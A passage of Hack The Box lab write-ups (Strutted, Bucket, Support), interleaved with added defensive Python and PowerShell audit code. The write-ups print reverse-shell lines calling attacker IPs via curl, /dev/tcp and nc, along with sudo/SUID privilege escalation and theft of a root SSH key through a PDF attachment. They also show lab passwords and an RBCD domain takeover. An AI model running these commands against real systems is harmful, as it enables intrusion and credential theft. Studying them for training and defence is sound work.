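Two weaknesses combine here: the magic-byte check inspects only the first eight bytes, so the JPEG-header-plus-JSP polyglot passes it, and the client-supplied top.UploadFileName is joined to the upload directory without any containment check, so ../../ escapes into the web root. As an added example that is not the project's code, the Python below ports the page's signature check, shows that the polyglot satisfies it, and adds the containment and file-name checks that would have stopped the traversal; the upload root and sample bodies are constructed.

```python
import os
from typing import Optional, Tuple

# Constructed values: the real Tomcat upload directory is not shown on the page, and the
# sample bodies mimic the writeup's test.jpeg and the JSP polyglot from the POST body.
UPLOAD_ROOT = "/var/lib/tomcat9/webapps/strutted/uploads"
ALLOWED_EXTENSIONS = {".jpeg", ".jpg", ".png", ".gif"}
REAL_JPEG_HEAD = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
POLYGLOT = b"\xff\xd8\xff\n<%@ page import=\"java.io.*\" %>\n<% /* ... */ %>\n"


def is_image_by_magic_bytes(data: bytes) -> bool:
    """Python port of the page's isImageByMagicBytes(): only the first 8 bytes matter."""
    if len(data) < 8:
        return False
    if data[:3] == b"\xff\xd8\xff":                                   # JPEG SOI marker
        return True
    if data[:4] == b"\x89PNG":                                        # PNG signature
        return True
    if data[:4] == b"GIF8" and data[4:5] in (b"7", b"9") and data[5:6] == b"a":  # GIF87a / GIF89a
        return True
    return False


def resolve_upload_path(upload_root: str, requested_name: str) -> Optional[str]:
    """Containment check the vulnerable flow lacks: the normalised destination must stay
    under upload_root, otherwise "../../revshell.jsp" lands two levels up in the web root."""
    root = os.path.abspath(upload_root)
    candidate = os.path.abspath(os.path.join(root, requested_name))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def accept_upload(data: bytes, requested_name: str, upload_root: str) -> Tuple[bool, str, Optional[str]]:
    """Defence in depth: reject path components, enforce an extension allow-list, require an
    image signature, and confirm containment. The signature check alone is satisfied by the
    polyglot, so it must never be the only control; a server-generated file name and a full
    decode/re-encode of the image (not done here) are the stronger options."""
    base = os.path.basename(requested_name.replace("\\", "/"))
    if base != requested_name or base in ("", ".", ".."):
        return False, "file name contains path components", None
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext!r} not allowed", None
    if not is_image_by_magic_bytes(data):
        return False, "content does not start with an image signature", None
    path = resolve_upload_path(upload_root, base)
    if path is None:
        return False, "destination escapes the upload root", None
    return True, "ok", path


if __name__ == "__main__":
    # The polyglot passes the signature check exactly as it did on the target...
    print("polyglot looks like an image:", is_image_by_magic_bytes(POLYGLOT))
    # ...but the traversal name is rejected before the content is even inspected.
    print(accept_upload(POLYGLOT, "../../revshell.jsp", UPLOAD_ROOT))
    print(accept_upload(REAL_JPEG_HEAD, "photo.jpeg", UPLOAD_ROOT))
```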


Sending a request such as revshell.jsp?action=cmd&cmd=ls confirms that RCE works.


Execute the following commands in order to create a reverse shell.

  1. cmd=curl http://10.10.14.136:8000/shell.sh -o /tmp/shell.sh
  2. chmod +x /tmp/shell.sh
  3. bash /tmp/shell.sh

I got a shell as the tomcat user.

$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.136] from (UNKNOWN) [10.10.11.59] 56452
bash: cannot set terminal process group (1052): Inappropriate ioctl for device
bash: no job control in this shell
tomcat@strutted:~$ whoami
whoami
tomcat

Set the TTY.

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

Looking at the Tomcat account authentication file tomcat-users.xml, a password string is visible.

/etc/tomcat9/tomcat-users.xml


(omitted)

<!--
  <user username="admin" password="<must-be-changed>" roles="manager-gui"/>
  <user username="robot" password="<must-be-changed>" roles="manager-script"/>
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="admin" password="IT14d6SSP81k" roles="manager-gui,admin-gui"/>
--->

(omitted)

SSH connection was successful with the obtained password.

$ ssh james@strutted.htb

I was able to get the user flag from /home/james/user.txt.

$ cat user.txt
129b84a2a8e0925db69c37fe9c51ae0b

Root Flag

Checking with sudo -l shows the settings for /usr/sbin/tcpdump.

$ sudo -l
Matching Defaults entries for james on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User james may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/sbin/tcpdump

I found privilege escalation in GTFOBins.


I was able to do it as described and set SUID in bash.

-bash-5.1$ COMMAND='chmod u+s /bin/bash'
-bash-5.1$ TF=$(mktemp)
-bash-5.1$ echo "$COMMAND" > $TF
-bash-5.1$ chmod +x $TF
-bash-5.1$ sudo /usr/sbin/tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
tcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 262144 bytes
Maximum file limit reached: 1
1 packet captured
4 packets received by filter
0 packets dropped by kernel
-bash-5.1$ whoami
james
-bash-5.1$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1396520 Mar 14  2024 /bin/bash

I was able to elevate to root privileges using bash’s SUID.

-bash-5.1$ /bin/bash -p
bash-5.1# whoami
root

I was able to get the root flag from /root/root.txt.

bash-5.1# cat /root/root.txt
39fb83665a3ce29520d7807a9363bad5

Hack The Box – Bucket Writeup


This is the Writeup of HackTheBox “Bucket”.

User Flag

Perform a port scan.

$ nmap -Pn -sCV -A -T4 -p- 10.10.10.212 -oN nmap_result
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://bucket.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)

The open ports and the services behind them are now known.

port  service  version
22    ssh      OpenSSH 8.2p1
80    http     Apache/2.4.41

Now that I know the domain name, I add it to /etc/hosts.

10.10.10.212    bucket.htb

Go to the website.


I found the subdomain s3.bucket.htb in the page source and added it to /etc/hosts.


It seems that the images are fetched from AWS S3, so I will install the AWS CLI to investigate.

First, install the AWS CLI.

$ sudo apt install -y awscli

Since no valid credentials are available, dummy values are configured.

$ aws configure
AWS Access Key ID [None]: test
AWS Secret Access Key [None]: test
Default region name [None]: test
Default output format [None]: test

aws s3 ls lists the contents of a bucket, and --endpoint-url optionally specifies the endpoint to query.


Running the command revealed the bucket name adserver.

$ aws s3 ls --endpoint-url=http://s3.bucket.htb
2025-04-06 04:13:02 adserver

I was able to list the image files in the adserver bucket.

$ aws s3 ls s3://adserver --endpoint-url=http://s3.bucket.htb 
                           PRE images/
2025-04-06 04:19:01       5344 index.html

Download the file in the bucket.

$ aws --endpoint-url=http://s3.bucket.htb s3 sync s3://adserver .

Check index.html.


Since it matches the website on the target machine, Apache is evidently serving files synced from this S3 bucket.

To confirm this hypothesis, copy a test PHP file to the bucket.

$ aws --endpoint-url=http://s3.bucket.htb s3 cp test.php s3://adserver
upload: ./test.php to s3://adserver/test.php

Accessing /test.php shows that the uploaded PHP file is executed.


From this, it looks like uploading a PHP reverse shell file will give us a reverse shell.

Create a PHP file for the reverse shell.

shell.php

<?php exec('bash -c "bash -i >& /dev/tcp/10.10.14.79/1234 0>&1"');?>

Upload the PHP file you created to S3.

$ aws --endpoint-url=http://s3.bucket.htb s3 cp shell.php s3://adserver

Listen with netcat.

$ nc -lnvp 1234

Accessing http://bucket.htb/shell.php gave me a reverse shell.

$ nc -lnvp 1234          
listening on [any] 1234 ...
connect to [10.10.14.79] from (UNKNOWN) [10.10.10.212] 41760
bash: cannot set terminal process group (1054): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bucket:/var/www/html$ whoami
whoami
www-data

Spawn a TTY.

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

It looks like we need to escalate to the roy account.

$ ls -la /home
ls -la /home
total 12
drwxr-xr-x  3 root root 4096 Sep 16  2020 .
drwxr-xr-x 21 root root 4096 Feb 10  2021 ..
drwxr-xr-x  5 roy  roy  4096 Apr  6 01:25 roy

In /home/roy/ I found a project folder that I can access.

$ ls -la /home/roy
ls -la /home/roy
total 56
drwxr-xr-x 5 roy  roy   4096 Apr  6 01:25 .
drwxr-xr-x 3 root root  4096 Sep 16  2020 ..
drwxrwxr-x 2 roy  roy   4096 Apr  4 20:14 .aws
lrwxrwxrwx 1 roy  roy      9 Sep 16  2020 .bash_history -> /dev/null
-rw-r--r-- 1 roy  roy    220 Sep 16  2020 .bash_logout
-rw-r--r-- 1 roy  roy   3771 Sep 16  2020 .bashrc
drwx------ 2 roy  roy   4096 Apr  4 20:13 .cache
-rw-r--r-- 1 roy  roy    807 Sep 16  2020 .profile
drwxr-xr-x 3 roy  roy   4096 Sep 24  2020 project
-rw-rw-r-- 1 roy  roy  19286 Apr  6 01:25 result.pdf
-r-------- 1 roy  roy     33 Apr  4 20:11 user.txt

It contains db.php.

$ ls -la /home/roy/project
ls -la /home/roy/project
total 44
drwxr-xr-x  3 roy roy  4096 Sep 24  2020 .
drwxr-xr-x  5 roy roy  4096 Apr  6 01:25 ..
-rw-rw-r--  1 roy roy    63 Sep 24  2020 composer.json
-rw-rw-r--  1 roy roy 20533 Sep 24  2020 composer.lock
-rw-r--r--  1 roy roy   367 Sep 24  2020 db.php
drwxrwxr-x 10 roy roy  4096 Sep 24  2020 vendor

Looking at /home/roy/project/db.php, it connects to DynamoDB at localhost:4566.

/home/roy/project/db.php

<?php
require 'vendor/autoload.php';
date_default_timezone_set('America/New_York');
use Aws\DynamoDb\DynamoDbClient;
use Aws\DynamoDb\Exception\DynamoDbException;

$client = new Aws\Sdk([
    'profile' => 'default',
    'region'  => 'us-east-1',
    'version' => 'latest',
    'endpoint' => 'http://localhost:4566'
]);

$dynamodb = $client->createDynamoDb();

//todo

Configure the AWS CLI on the target machine.

$ aws configure
aws configure
AWS Access Key ID [None]: test
test
AWS Secret Access Key [None]: test
test
Default region name [None]: ue-east-1
ue-east-1
Default output format [None]: json 
json

Using the AWS CLI, I can connect to DynamoDB; list-tables shows a users table.

$ aws dynamodb list-tables --endpoint-url http://localhost:4566
<db list-tables --endpoint-url http://localhost:4566
{
    "TableNames": [
        "users"
    ]
}

Scanning the users table returned several passwords.

$ aws dynamodb scan --table-name users --endpoint-url=http://localhost:4566 
<ble-name users --endpoint-url=http://localhost:4566
{
    "Items": [
        {
            "password": {
                "S": "Management@#1@#"
            },
            "username": {
                "S": "Mgmt"
            }
        },
        {
            "password": {
                "S": "Welcome123!"
            },
            "username": {
                "S": "Cloudadm"
            }
        },
        {
            "password": {
                "S": "n2vM-<_K_Q:.Aa2"
            },
            "username": {
                "S": "Sysadm"
            }
        }
    ],
    "Count": 3,
    "ScannedCount": 3,
    "ConsumedCapacity": null
}

SSH as roy succeeded with the password n2vM-<_K_Q:.Aa2.

$ ssh roy@bucket.htb
roy@bucket:/tmp$

I got the user flag from /home/roy/user.txt.

$ cat user.txt 
44819fc84df2389e1093c2a15638de74

Root Flag

Run linpeas.

$ ./linpeas.sh

It shows that port 8000 is listening locally.

╔══════════╣ Active Ports
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports           
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                      
tcp        0      0 127.0.0.1:4566          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:38957         0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -

Port forwarding with SSH.

$ ssh roy@bucket.htb -L 8000:127.0.0.1:8000

I was able to access the website.


Checking the Apache configuration, this virtual host is configured with AssignUserId root root.
So exploiting a vulnerability in this web application should allow privilege escalation to root.

The document root is /var/www/bucket-app.

/etc/apache2/sites-enabled/000-default.conf

<VirtualHost 127.0.0.1:8000>
        <IfModule mpm_itk_module>
                AssignUserId root root
        </IfModule>
        DocumentRoot /var/www/bucket-app
</VirtualHost>

Check /var/www/bucket-app/index.php.

When a POST request with action=get_alerts arrives, it connects to DynamoDB at localhost:4566.

It then scans the alerts table for items whose title is Ransomware.

For each item, it writes the data field to a randomly named HTML file under files/.

/var/www/bucket-app/index.php

<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
if($_SERVER["REQUEST_METHOD"]==="POST") {
        if($_POST["action"]==="get_alerts") {
                date_default_timezone_set('America/New_York');
                $client = new DynamoDbClient([
                        'profile' => 'default',
                        'region'  => 'us-east-1',
                        'version' => 'latest',
                        'endpoint' => 'http://localhost:4566'
                ]);

                $iterator = $client->getIterator('Scan', array(
                        'TableName' => 'alerts',
                        'FilterExpression' => "title = :title",
                        'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
                ));

                foreach ($iterator as $item) {
                        $name=rand(1,10000).'.html';
                        file_put_contents('files/'.$name,$item["data"]);
                }
                passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
        }
}
else
{
?>

(omitted)

Finally, it runs pd4ml via passthru to convert the last HTML file to PDF.


pd4ml is a Java library that converts HTML to PDF.


There is no alerts table by default, so I create one with the AWS CLI from Kali.

$ aws --endpoint-url http://s3.bucket.htb dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5
{
    "TableDescription": {
        "AttributeDefinitions": [
            {
                "AttributeName": "title",
                "AttributeType": "S"
            },
            {
                "AttributeName": "data",
                "AttributeType": "S"
            }
        ],

(omitted)

Insert an item whose title is Ransomware.

$ aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"This is a test"}}'
{
    "ConsumedCapacity": {
        "TableName": "alerts",
        "CapacityUnits": 1.0
    }
}

Trigger the index.php processing.

$ curl http://127.0.0.1:8000/index.php --data 'action=get_alerts'

The HTML and PDF files are then created under /var/www/bucket-app/files.

$ ls -la /var/www/bucket-app/files/
total 16
drwxr-x---+ 2 root root 4096 Apr  9 12:59 .
drwxr-x---+ 4 root root 4096 Feb 10  2021 ..
-rw-r--r--  1 root root   14 Apr  9 12:59 4094.html
-rw-r--r--  1 root root 1633 Apr  9 12:59 result.pdf

The HTML contains data from DynamoDB.

roy@bucket:/var/www/bucket-app/files$ cat 4094.html 
This is a test

Downloading the PDF confirms that pd4ml converted the HTML data to PDF.


Reading the pd4ml documentation, it seems a file can be attached to the PDF with the <pd4ml:attachment> tag.


Since the application runs as root root, it should be possible to attach a root-only file and escalate privileges.


Attach /root/.ssh/id_rsa.

$ aws --endpoint-url=http://s3.bucket.htb dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<html><pd4ml:attachment src='\''file:///root/.ssh/id_rsa'\'' description='\''test'\'' icon='\''Paperclip'\''/></html>"}}'
{
    "ConsumedCapacity": {
        "TableName": "alerts",
        "CapacityUnits": 1.0
    }
}

Send a POST request and have the PDF file created.

$ curl http://127.0.0.1:8000/index.php --data 'action=get_alerts'

Downloading the resulting PDF, id_rsa is attached to it.


With the obtained private key, the root SSH connection was successful.

$ ssh root@bucket.htb -i id_rsa
root@bucket:~# whoami
root

I got the root flag from /root/root.txt.

# cat /root/root.txt 
8af91c8d1e7d26954b4f4eb69f891a74

Hack The Box – Support Writeup


This is the Writeup of HackTheBox “Support”.

User Flag

Perform a port scan.

$ nmap -Pn -sCV -A -T4 -p- -oN nmap_result 10.10.11.174
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-09 13:31:34Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49686/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
49741/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-04-09T13:32:36
|_  start_date: N/A
|_clock-skew: 1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

The port scan shows which ports are open.

Now that I know the domain name, I will add it to /etc/hosts.

10.10.11.174    support.htb

I queried DNS and found the dc.support.htb hostname, so I add it to /etc/hosts as well.

$ dig @10.10.11.174 support.htb any

;; ANSWER SECTION:
support.htb.            600     IN      A       10.10.11.174
support.htb.            3600    IN      NS      dc.support.htb.
support.htb.            3600    IN      SOA     dc.support.htb. hostmaster.support.htb. 107 900 600 86400 3600

Start with SMB enumeration.

Enumerating the share names reveals a share called support-tools.

$ smbclient -N -L 10.10.11.174

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        support-tools   Disk      support staff tools
        SYSVOL          Disk      Logon server share

Inside support-tools there are multiple exe and zip files.

$ smbclient -N //10.10.11.174/support-tools
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jul 20 13:01:06 2022
  ..                                  D        0  Sat May 28 07:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022
  putty.exe                           A  1273576  Sat May 28 07:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022

UserInfo.exe.zip looks suspicious, so I download it.

smb: \> get UserInfo.exe.zip 
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (48.3 KiloBytes/sec) (average 48.3 KiloBytes/sec)

Unzipping it gives an executable called UserInfo.exe.

$ ls -la
total 944
drwxrwxr-x 2 kali kali   4096 Apr 12 11:44 .
drwxrwxr-x 3 kali kali   4096 Apr 12 11:43 ..
-rw-rw-rw- 1 kali kali  99840 Mar  1  2022 CommandLineParser.dll
-rw-rw-rw- 1 kali kali  22144 Oct 22  2021 Microsoft.Bcl.AsyncInterfaces.dll
-rw-rw-rw- 1 kali kali  47216 Oct 22  2021 Microsoft.Extensions.DependencyInjection.Abstractions.dll
-rw-rw-rw- 1 kali kali  84608 Oct 22  2021 Microsoft.Extensions.DependencyInjection.dll
-rw-rw-rw- 1 kali kali  64112 Oct 22  2021 Microsoft.Extensions.Logging.Abstractions.dll
-rw-rw-rw- 1 kali kali  20856 Feb 19  2020 System.Buffers.dll
-rw-rw-rw- 1 kali kali 141184 Feb 19  2020 System.Memory.dll
-rw-rw-rw- 1 kali kali 115856 May 15  2018 System.Numerics.Vectors.dll
-rw-rw-rw- 1 kali kali  18024 Oct 22  2021 System.Runtime.CompilerServices.Unsafe.dll
-rw-rw-rw- 1 kali kali  25984 Feb 19  2020 System.Threading.Tasks.Extensions.dll
-rwxrwxrwx 1 kali kali  12288 May 27  2022 UserInfo.exe
-rw-rw-rw- 1 kali kali    563 May 27  2022 UserInfo.exe.config

UserInfo.exe seems to be a .NET executable.

$ file UserInfo.exe        
UserInfo.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections

Decompile it with dnSpy:


In UserInfo.Services.LdapQuery, I can see that it calls getPassword() and then connects to LDAP through DirectoryEntry.


getPassword() decrypts enc_password.


Since the LDAP communication is in plain text, let's capture the LDAP login with Wireshark.

First, check the commands the executable accepts.
It takes a find or user command.

$ mono UserInfo.exe

Usage: UserInfo.exe [options] [commands]

Options: 
  -v|--verbose        Verbose output                                    

Commands: 
  find                Find a user                                       
  user                Get information about a user

The user command also requires the -username option.

$ mono UserInfo.exe user
Unable to parse command 'user' reason: Required option '-username' not found!

Execution succeeded.

$ mono UserInfo.exe user -username hello -v
[*] Getting data for hello
[-] Exception: No Such Object

In Wireshark, I was able to capture the LDAP authentication packets.


Looking at the bindRequest packet data, I found a string that looks like a password.
The following bindResponse packet reports success, so authentication with this string works.


Enumerate LDAP with ldapsearch.

$ ldapsearch -x -H ldap://support.htb -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'DC=support, DC=htb' > ldapsearch_result

In the results, the info attribute of the support user contains a password-like string.

# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support

(omitted)

info: Ironside47pleasure40Watchful
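The defensive counterpart to this finding, as an added PowerShell example that is not part of the writeup: an audit of the free-text attributes the support user's password was left in. It assumes the ActiveDirectory module on a domain-joined host; the attribute list and regexes are my own heuristics.

```powershell
# Added example, not from the writeup: find credentials left in free-text AD
# attributes (info, description, comment). Any authenticated domain user can read
# these attributes, which is how the support user's password was recovered here.
Import-Module ActiveDirectory

# Attributes to inspect and the heuristics applied to them (assumptions; tune them).
$SecretAttributes = 'info', 'description', 'comment'
$SecretPatterns = @(
    '(?i)\b(pass(word|wd|phrase)?|pwd|secret|credential)\b'   # credential keyword
    '(?=\S*\d)(?=\S*[A-Za-z])\S{12,}'                         # long mixed token such as Ironside47pleasure40Watchful (noisy on hostnames)
)

function Find-AttributeSecret {
    param(
        [string]$SearchBase = (Get-ADDomain).DistinguishedName
    )
    # objectClass=user also matches computer objects, which inherit from user.
    Get-ADObject -Filter { objectClass -eq 'user' } -SearchBase $SearchBase `
                 -Properties $SecretAttributes |
    ForEach-Object {
        $obj = $_
        foreach ($attr in $SecretAttributes) {
            # description can be multi-valued; join so the regexes see one string
            $value = (@($obj.$attr) -join ' ').Trim()
            if (-not $value) { continue }
            foreach ($pattern in $SecretPatterns) {
                if ($value -match $pattern) {
                    [pscustomobject]@{
                        Object    = $obj.DistinguishedName
                        Attribute = $attr
                        Value     = $value
                        Reason    = $pattern
                    }
                    break   # one hit per attribute is enough
                }
            }
        }
    }
}

# Report, then (after rotating the credential) clear the attribute:
#   Set-ADObject -Identity $dn -Clear info
Find-AttributeSecret | Format-List
```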

Since port 5985 is open, connecting with WinRM succeeds.

$ evil-winrm -u support -p 'Ironside47pleasure40Watchful' -i support.htb

*Evil-WinRM* PS C:\Users\support\Documents> whoami
support\support

I got the user flag from Desktop/user.txt.

*Evil-WinRM* PS C:\Users\support\Documents> more ..\Desktop\user.txt
2b46946973813a3227dc277318e6809d

Root Flag

Enumerate the AD environment with BloodHound.
To do so, upload sharphound.exe to the target machine and run it.

*Evil-WinRM* PS C:\Users\support\Documents> wget http://10.10.14.136/SharpHound.exe -o sharphound.exe
*Evil-WinRM* PS C:\Users\support\Documents> .\sharphound.exe

Download the created zip file and load it into BloodHound.


Under Outbound Object Control for my account support@support.htb, there is one Group Delegated Object Control entry.


support@support.htb is a member of shared support accounts@support.htb, and that group has GenericAll over DC.support.htb.


Right-click the GenericAll edge -> Help -> Windows Abuse to see how the permission can be abused.


This time, it seems that RBCD attacks can be used for privilege escalation.

ms-DS-MachineAccountQuota is 10, so a user can add up to 10 computers.

*Evil-WinRM* PS C:\Users\support\Documents> Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota


DistinguishedName         : DC=support,DC=htb
ms-DS-MachineAccountQuota : 10
Name                      : support
ObjectClass               : domainDNS
ObjectGUID                : 553cd9a3-86c4-4d64-9e85-5146a98c868e

Use PowerView to verify that RBCD is not already configured on DC.

*Evil-WinRM* PS C:\Users\support\Documents> . ./PowerView.ps1
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity

name msds-allowedtoactonbehalfofotheridentity
---- ----------------------------------------
DC   

Use Powermad to create a fake machine account for the attack and add it to the domain.

*Evil-WinRM* PS C:\Users\support\Documents> . ./Powermad.ps1
*Evil-WinRM* PS C:\Users\support\Documents> New-MachineAccount -MachineAccount FAKE-COMP03 -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
[+] Machine account FAKE-COMP03 added

FAKE-COMP03 was added.

*Evil-WinRM* PS C:\Users\support\Documents> Get-ADComputer -identity FAKE-COMP03


DistinguishedName : CN=FAKE-COMP03,CN=Computers,DC=support,DC=htb
DNSHostName       : FAKE-COMP03.support.htb
Enabled           : True
Name              : FAKE-COMP03
ObjectClass       : computer
ObjectGUID        : 75b3431a-c6ea-4069-8133-ba04103a153f
SamAccountName    : FAKE-COMP03$
SID               : S-1-5-21-1677581083-3380853377-188903654-5604
UserPrincipalName :

Add FAKE-COMP03 to the RBCD settings of DC.
FAKE-COMP03 can now impersonate the domain administrator when requesting Kerberos tickets for DC.

*Evil-WinRM* PS C:\Users\support\Documents> Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount FAKE-COMP03$
*Evil-WinRM* PS C:\Users\support\Documents> Get-ADComputer -Identity DC -Properties PrincipalsAllowedToDelegateToAccount


DistinguishedName                    : CN=DC,OU=Domain Controllers,DC=support,DC=htb
DNSHostName                          : dc.support.htb
Enabled                              : True
Name                                 : DC
ObjectClass                          : computer
ObjectGUID                           : afa13f1c-0399-4f7e-863f-e9c3b94c4127
PrincipalsAllowedToDelegateToAccount : {CN=FAKE-COMP03,CN=Computers,DC=support,DC=htb}
SamAccountName                       : DC$
SID                                  : S-1-5-21-1677581083-3380853377-188903654-1000
UserPrincipalName                    :
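The conditions this chain relied on (an open machine-account quota, a writable RBCD attribute on the DC, and a non-admin group with GenericAll over the DC object) can be audited with the same cmdlets. The following is an added example, not part of the writeup; it assumes the ActiveDirectory module on a domain-joined host with rights to read the DC objects' ACLs, and the $TrustedPrincipal exclusion list is my assumption to tune per domain.

```powershell
# Added example, not from the writeup: audit the conditions behind an RBCD
# escalation. Assumes the ActiveDirectory module and an account that can read
# the domain controllers' object ACLs.
Import-Module ActiveDirectory

# Principals that legitimately hold control over DC objects (assumption; tune per domain).
$TrustedPrincipal = '^(NT AUTHORITY\\(SYSTEM|SELF|ENTERPRISE DOMAIN CONTROLLERS)|BUILTIN\\Administrators|.*\\(Domain Admins|Enterprise Admins|Domain Controllers|Key Admins|Enterprise Key Admins))$'

function Get-RbcdExposure {
    $domain = Get-ADDomain

    # 1. Who may create machine accounts at all (ms-DS-MachineAccountQuota, 10 by default).
    $maq = (Get-ADObject -Identity $domain.DistinguishedName `
                -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'

    # 2. Computers that already carry msDS-AllowedToActOnBehalfOfOtherIdentity,
    #    exposed by the AD module as PrincipalsAllowedToDelegateToAccount.
    $rbcd = Get-ADComputer -Filter * -Properties PrincipalsAllowedToDelegateToAccount |
        Where-Object { $_.PrincipalsAllowedToDelegateToAccount.Count -gt 0 } |
        Select-Object Name, @{ n = 'AllowedToActOnBehalf'; e = { $_.PrincipalsAllowedToDelegateToAccount -join '; ' } }

    # 3. Machine accounts created by ordinary users through the quota: the DC stamps
    #    mS-DS-CreatorSID only when the creator lacked Create-Child on the container.
    $userCreated = Get-ADComputer -Filter * -Properties whenCreated, 'mS-DS-CreatorSID' |
        Where-Object { $_.'mS-DS-CreatorSID' } |
        Select-Object Name, whenCreated, @{ n = 'CreatorSid'; e = {
            [System.Security.Principal.SecurityIdentifier]::new($_.'mS-DS-CreatorSID', 0).Value } }

    # 4. ACEs on each DC's computer object that let a non-admin write the RBCD
    #    attribute: GenericAll, WriteDacl/WriteOwner, or WriteProperty on that
    #    attribute (or on all attributes). The attribute GUID is read from the schema.
    $schema = (Get-ADRootDSE).schemaNamingContext
    $rbcdGuid = [guid](Get-ADObject -SearchBase $schema `
        -Filter { lDAPDisplayName -eq 'msDS-AllowedToActOnBehalfOfOtherIdentity' } `
        -Properties schemaIDGUID).schemaIDGUID
    $rights = [System.DirectoryServices.ActiveDirectoryRights]
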